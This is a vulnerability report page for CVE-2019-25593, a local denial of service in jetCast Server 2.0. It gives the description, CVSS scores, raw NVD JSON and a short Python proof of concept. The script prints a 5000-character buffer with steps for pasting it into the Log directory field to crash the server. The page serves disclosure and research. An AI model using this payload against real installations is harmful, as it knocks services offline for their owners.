Security Vulnerability Report
CVE-2019-25593 CVSS 5.5 MEDIUM

CVE-2019-25593

Published: 2026-03-22 14:16:26
Last Modified: 2026-04-16 16:19:51

Description

jetCast Server 2.0 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Log directory configuration field. Attackers can paste a buffer of 5000 characters into the Log directory input, then click Start to trigger a crash that terminates the server process.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

jetCast Server 2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2019-25593 PoC Generator
# This script generates the malicious payload used to crash jetCast Server 2.0.
# Usage: Run the script, copy the output, and paste it into the 'Log directory' field in jetCast Server.

def generate_payload():
    # The vulnerability is triggered by a string of approximately 5000 characters
    buffer_size = 5000
    payload = "A" * buffer_size
    return payload

if __name__ == "__main__":
    try:
        exploit_code = generate_payload()
        print("[+] Payload generated successfully.")
        print(f"[+] Payload length: {len(exploit_code)} characters")
        print("\n--- PAYLOAD START ---")
        print(exploit_code)
        print("--- PAYLOAD END ---")
        print("\n[!] Instructions:")
        print("1. Copy the payload above.")
        print("2. Open jetCast Server 2.0.")
        print("3. Paste the payload into the 'Log directory' configuration field.")
        print("4. Click 'Start' to trigger the crash.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25593", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:26.027", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "jetCast Server 2.0 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Log directory configuration field. Attackers can paste a buffer of 5000 characters into the Log directory input, then click Start to trigger a crash that terminates the server process."}, {"lang": "es", "value": "jetCast Servidor 2.0 contiene una vulnerabilidad de denegación de servicio que permite a los atacantes locales bloquear la aplicación al proporcionar una cadena excesivamente larga en el campo de configuración del directorio de registro. Los atacantes pueden pegar un búfer de 5000 caracteres en la entrada del directorio de registro, luego hacer clic en Iniciar para desencadenar un bloqueo que termina el proceso del servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", 
"modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1285"}]}], "references": [{"url": "http://www.jetaudio.com/", "source": "[email protected]"}, {"url": "http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46819", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/jetcast-server-denial-of-service-via-log-directory", "source": "[email protected]"}]}}